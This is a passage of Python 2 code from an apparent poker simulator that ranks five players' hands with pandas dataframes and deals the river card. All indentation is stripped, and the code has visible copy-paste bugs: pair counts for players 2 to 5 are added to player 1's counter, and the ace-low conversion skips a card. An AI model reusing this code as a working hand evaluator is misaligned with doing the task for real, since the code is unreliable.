if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P3 Evaluation
# With Ace Low
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P4 Evaluation
# With Ace Low
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P5 Evaluation
# With Ace Low
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# Check for Straight
if (SF > 0):
print "Straight"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for 3 of a kind
FH = 0
a1i = 0
a2i = 0
a3i = 0
a4i = 0
a5i = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a1i = m
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a2i = m
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a3i = m
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a4i = m
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a5i = m
break
# Evaluating for 3 of a kind
if (FH > 0):
print "3 of a kind"
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Evaluate for two pair and one pair
f1 = [0]
f2 = [0]
f3 = [0]
f4 = [0]
f5 = [0]
a1 = [0]
a2 = [0]
a3 = [0]
a4 = [0]
a5 = [0]
Fin = 0
# Evaluate P1
TP1 = 0
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
if (list[0] == list[2] or list[0] == list[3] or list[
0] == list[4] or list[0] == list[5]):
TP1 = TP1 + 1
f1.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5]):
TP1 = TP1 + 1
f1.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f1.append(list[1])
if TP1 > 1:
f1 = np.sort(f1[::-1]).tolist()
a1.append(f1[0])
a1.append(f1[1])
Fin = Fin + 1
# Evaluate P2
TP2 = 0
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
if (list[0] == list[2] or list[0] == list[3] or
list[0] == list[4] or list[0] == list[5]):
TP2 = TP2 + 1
f2.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5]):
TP2 = TP2 + 1
f2.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f2.append(list[1])
if TP2 > 1:
f2 = np.sort(f2[::-1]).tolist()
a2.append(f2[0])
a2.append(f2[1])
Fin = Fin + 1
# Evaluate P3
TP3 = 0
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
if (list[0] == list[2] or list[0] == list[
3] or list[0] == list[4] or list[0] == list[5]):
TP3 = TP3 + 1
f3.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5]):
TP3 = TP3 + 1
f3.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f3.append(list[1])
if TP3 > 1:
f3 = np.sort(f3[::-1]).tolist()
a3.append(f3[0])
a3.append(f3[1])
Fin = Fin + 1
# Evaluate P4
TP4 = 0
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
if (list[0] == list[2] or list[0] == list[
3] or list[0] == list[4] or list[0] == list[5]):
TP4 = TP4 + 1
f4.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[
4] or list[1] == list[5]):
TP4 = TP4 + 1
f4.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f4.append(list[1])
if TP4 > 1:
f4 = np.sort(f4[::-1]).tolist()
a4.append(f4[0])
a4.append(f4[1])
Fin = Fin + 1
# Evaluate P5
TP5 = 0
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
if (list[0] == list[2] or list[0] ==
list[3] or list[0] == list[4] or list[0] == list[5]):
TP5 = TP5 + 1
f5.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] ==
list[4] or list[1] == list[5]):
TP5 = TP5 + 1
f5.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f5.append(list[1])
if TP5 > 1:
f5 = np.sort(f5[::-1]).tolist()
a5.append(f5[0])
a5.append(f5[1])
Fin = Fin + 1
#Check for two pair
if Fin > 0:
print "Two pair"
b = max(max(a1),max(a2),max(a3),max(a4),max(a5))
if max(a1) == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif max(a2) == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif max(a3) == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif max(a4) == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif max(a5) == b:
df5.iloc[i * 4 + k - 1, 14] = 1
#Check for one pair
elif TP1+TP2+TP3+TP4+TP5 > 0:
print "One pair"
b = max(max(f1),max(f2),max(f3),max(f4),max(f5))
if max(f1) == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if max(f2) == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if max(f3) == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if max(f4) == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if max(f5) == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Find the high card
print "High Card"
winner = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3] )
if df1.iloc[i * 4 + k - 1, 1] == winner or df1.iloc[
i * 4 + k - 1, 3] == winner:
df1.iloc[i * 4 + k - 1, 14] = 1
if df2.iloc[i * 4 + k - 1, 1] == winner or df2.iloc[
i * 4 + k - 1, 3] == winner:
df2.iloc[i * 4 + k - 1, 14] = 1
if df3.iloc[i * 4 + k - 1, 1] == winner or df3.iloc[
i * 4 + k - 1, 3] == winner:
df3.iloc[i * 4 + k - 1, 14] = 1
if df4.iloc[i * 4 + k - 1, 1] == winner or df4.iloc[
i * 4 + k - 1, 3] == winner:
df4.iloc[i * 4 + k - 1, 14] = 1
if df5.iloc[i * 4 + k - 1, 1] == winner or df5.iloc[
i * 4 + k - 1, 3] == winner:
df5.iloc[i * 4 + k - 1, 14] = 1
if k == 4:
#Create the River
df1.loc[i * 4 + k-1] = df1.loc[i * 4 + k - 2]
df2.loc[i * 4 + k - 1] = df2.loc[i * 4 + k - 2]
df3.loc[i * 4 + k - 1] = df3.loc[i * 4 + k - 2]
df4.loc[i * 4 + k - 1] = df4.loc[i * 4 + k - 2]
df5.loc[i * 4 + k - 1] = df5.loc[i * 4 + k - 2]
while x == 0:
print "Step 14"
# Generate 5th community card or the river
df1.iloc[i * 4 + k-1][12] = random.randrange(1, 5)
df1.iloc[i * 4 + k-1][13] = random.randrange(2, 15)
df2.iloc[i * 4 + k - 1][12] = df1.iloc[i * 4 + k - 1][12]
df2.iloc[i * 4 + k - 1][13] = df1.iloc[i * 4 + k - 1][13]
df3.iloc[i * 4 + k - 1][12] = df1.iloc[i * 4 + k - 1][12]
df3.iloc[i * 4 + k - 1][13] = df1.iloc[i * 4 + k - 1][13]
df4.iloc[i * 4 + k - 1][12] = df1.iloc[i * 4 + k - 1][12]
df4.iloc[i * 4 + k - 1][13] = df1.iloc[i * 4 + k - 1][13]
df5.iloc[i * 4 + k - 1][12] = df1.iloc[i * 4 + k - 1][12]
df5.iloc[i * 4 + k - 1][13] = df1.iloc[i * 4 + k - 1][13]
# Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 10] and df1.iloc[i * 4 + k - 1, 13] ==
df1.iloc[i * 4 + k - 1, 11]) \
or (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 8] and df1.iloc[
i * 4 + k - 1, 13] == df1.iloc[i * 4 + k - 1, 9]) \
or (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 6] and df1.iloc[
i * 4 + k - 1, 13] == df1.iloc[i * 4 + k - 1, 7]) \
or (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 4] and df1.iloc[
i * 4 + k - 1, 13] == df1.iloc[i * 4 + k - 1, 5]) \
or (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 13] == df1.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 12] == df1.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 13] == df1.iloc[i * 4 + k - 1, 1])\
or (df1.iloc[i * 4 + k - 1, 12] == df2.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 13] == df2.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 12] == df3.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 13] == df3.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 12] == df4.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 13] == df4.iloc[i * 4 + k - 1, 3])\
or (df1.iloc[i * 4 + k - 1, 12] == df5.iloc[i * 4 + k - 1, 2] and df1.iloc[
i * 4 + k - 1, 13] == df5.iloc[i * 4 + k - 1, 3]) \
or (df1.iloc[i * 4 + k - 1, 12] == df2.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 13] == df2.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 12] == df3.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 13] == df3.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 12] == df4.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 13] == df4.iloc[i * 4 + k - 1, 1]) \
or (df1.iloc[i * 4 + k - 1, 12] == df5.iloc[i * 4 + k - 1, 0] and df1.iloc[
i * 4 + k - 1, 13] == df5.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
#Evaluate river round
list = [[-1, -1],
[-1, -1],
[-1, -1],
[-1, -1],
[-1, -1],
[-1, -1],
[-1, -1]]
df1.iloc[i * 4 + k - 1, 14] = 0
df2.iloc[i * 4 + k - 1, 14] = 0
df3.iloc[i * 4 + k - 1, 14] = 0
df4.iloc[i * 4 + k - 1, 14] = 0
df5.iloc[i * 4 + k - 1, 14] = 0
# Straight Flush Evaluation
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# P1 Evaluation
#With Ace Low
list[0] = [df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 0]]
list[1] = [df1.iloc[i * 4 + k - 1, 3], df1.iloc[i * 4 + k - 1, 2]]
list[2] = [df1.iloc[i * 4 + k - 1, 5], df1.iloc[i * 4 + k - 1, 4]]
list[3] = [df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 6]]
list[4] = [df1.iloc[i * 4 + k - 1, 9], df1.iloc[i * 4 + k - 1, 8]]
list[5] = [df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 10]]
list[6] = [df1.iloc[i * 4 + k - 1, 13], df1.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a1 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a1 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][0] and list[5][0]+1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and list[5][1] == list[6][1]:
a1 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 0]]
list[1] = [df1.iloc[i * 4 + k - 1, 3], df1.iloc[i * 4 + k - 1, 2]]
list[2] = [df1.iloc[i * 4 + k - 1, 5], df1.iloc[i * 4 + k - 1, 4]]
list[3] = [df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 6]]
list[4] = [df1.iloc[i * 4 + k - 1, 9], df1.iloc[i * 4 + k - 1, 8]]
list[5] = [df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 10]]
list[6] = [df1.iloc[i * 4 + k - 1, 13], df1.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a1 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1]:
a1 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][0] and list[5][0]+1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and list[5][1] == list[6][1]:
a1 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P2 Evaluation
# With Ace Low
list[0] = [df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 0]]
list[1] = [df2.iloc[i * 4 + k - 1, 3], df2.iloc[i * 4 + k - 1, 2]]
list[2] = [df2.iloc[i * 4 + k - 1, 5], df2.iloc[i * 4 + k - 1, 4]]
list[3] = [df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 6]]
list[4] = [df2.iloc[i * 4 + k - 1, 9], df2.iloc[i * 4 + k - 1, 8]]
list[5] = [df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 10]]
list[6] = [df2.iloc[i * 4 + k - 1, 13], df2.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1]:
a2 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a2 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a2 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 0]]
list[1] = [df2.iloc[i * 4 + k - 1, 3], df2.iloc[i * 4 + k - 1, 2]]
list[2] = [df2.iloc[i * 4 + k - 1, 5], df2.iloc[i * 4 + k - 1, 4]]
list[3] = [df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 6]]
list[4] = [df2.iloc[i * 4 + k - 1, 9], df2.iloc[i * 4 + k - 1, 8]]
list[5] = [df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 10]]
list[6] = [df2.iloc[i * 4 + k - 1, 13], df2.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a2 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a2 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a2 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# P3 Evaluation
# With Ace Low
list[0] = [df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 0]]
list[1] = [df3.iloc[i * 4 + k - 1, 3], df3.iloc[i * 4 + k - 1, 2]]
list[2] = [df3.iloc[i * 4 + k - 1, 5], df3.iloc[i * 4 + k - 1, 4]]
list[3] = [df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 6]]
list[4] = [df3.iloc[i * 4 + k - 1, 9], df3.iloc[i * 4 + k - 1, 8]]
list[5] = [df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 10]]
list[6] = [df3.iloc[i * 4 + k - 1, 13], df3.iloc[i * 4 + k - 1, 12]]
for m in range(0, 7):
if list[m][0] == 14:
list[m][0] = 1
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
4][0] and list[0][1] == list[1][1] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and \
list[3][1] == list[4][1]:
a3 = max(list[0][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][
0] and list[4][0] + 1 == list[
5][0] and list[1][1] == list[2][1] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and \
list[4][1] == list[5][1]:
a3 = max(list[5][0], list[1][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
if list[2][0] + 1 == list[3][0] and list[3][0] + 1 == list[4][0] and list[4][0] + 1 == list[5][
0] and list[5][0] + 1 == list[
6][0] and list[2][1] == list[3][1] and list[3][1] == list[4][1] and list[4][1] == list[5][1] and \
list[5][1] == list[6][1]:
a3 = max(list[5][0], list[6][0], list[2][0], list[3][0], list[4][0])
SF = SF + 1
# With Ace High
list[0] = [df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 0]]
list[1] = [df3.iloc[i * 4 + k - 1, 3], df3.iloc[i * 4 + k - 1, 2]]
list[2] = [df3.iloc[i * 4 + k - 1, 5], df3.iloc[i * 4 + k - 1, 4]]
list[3] = [df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 6]]
list[4] = [df3.iloc[i * 4 + k - 1, 9], df3.iloc[i * 4 + k - 1, 8]]
list[5] = [df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 10]]
list[6] = [df3.iloc[i * 4 + k - 1, 13], df3.iloc[i * 4 + k - 1, 12]]
list = sorted(list, key=lambda x: x[0])
if list[0][0] + 1 == list[1][0] and list[1][0] + 1 == list[2][0] and list[2][0] + 1 == list[3][
0] and list[3][0] + 1 == list[
